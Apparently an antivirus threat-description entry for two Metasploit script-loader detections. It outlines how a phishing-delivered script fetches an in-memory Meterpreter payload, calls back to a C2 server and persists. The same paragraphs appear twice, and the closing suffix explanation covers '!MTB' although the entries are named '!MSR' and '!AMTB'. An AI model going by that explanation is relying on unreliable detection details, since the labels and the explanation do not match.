Trojan:Script/Metasploit!MSR represents a critical detection for weaponized scripts, crafted in JavaScript or VBScript, that function as the initial loader in a multi-stage attack chain leveraging the Metasploit Framework. This malicious script serves as a delivery mechanism, often distributed through phishing emails with deceptive attachments or by exploiting vulnerabilities in unpatched software. Upon launch, its primary function is to retrieve and deploy a memory-resident Meterpreter payload from a remote server under the threat actor’s control.  

This advanced payload then establishes a reverse TCP, HTTP, or HTTPS connection to a designated command-and-control (C2) server, creating a covert channel for remote administration. The connection provides the threat actor with comprehensive system-level command access, activating a range of malicious activities from credential harvesting and keystroke logging to file exfiltration and the deployment of secondary payloads such as ransomware.  

Operating in memory (fileless), the payload injects itself into legitimate system processes to evade traditional file-based detection. The initial script attempts to establish persistence through Windows Registry modifications or scheduled tasks to ensure survival after a system reboot. 

Trojan:Script/Metasploit!AMTB represents a critical detection for weaponized scripts, crafted in JavaScript or VBScript, that function as the initial loader in a multi-stage attack chain leveraging the Metasploit Framework. This malicious script serves as a delivery mechanism, often distributed through phishing emails with deceptive attachments or by exploiting vulnerabilities in unpatched software. Upon launch, its primary function is to retrieve and deploy a memory-resident Meterpreter payload from a remote server under the threat actor’s control.  

This advanced payload then establishes a reverse TCP, HTTP, or HTTPS connection to a designated command-and-control (C2) server, creating a covert channel for remote administration. The connection provides the threat actor with comprehensive system-level command access, activating a range of malicious activities from credential harvesting and keystroke logging to file exfiltration and the deployment of secondary payloads such as ransomware.  

Operating in memory (fileless), the payload injects itself into legitimate system processes to evade traditional file-based detection. The initial script attempts to establish persistence through Windows Registry modifications or scheduled tasks to ensure survival after a system reboot. 

The "!MTB" suffix denotes Machine Threat Behavior, signifying that the threat was flagged through behavioral monitoring or machine learning techniques. Rather than traditional static indicators like file hashes, the antivirus identifies operational sequences, behavioral traits, or code characteristics aligned with the broader "Metasploit" category.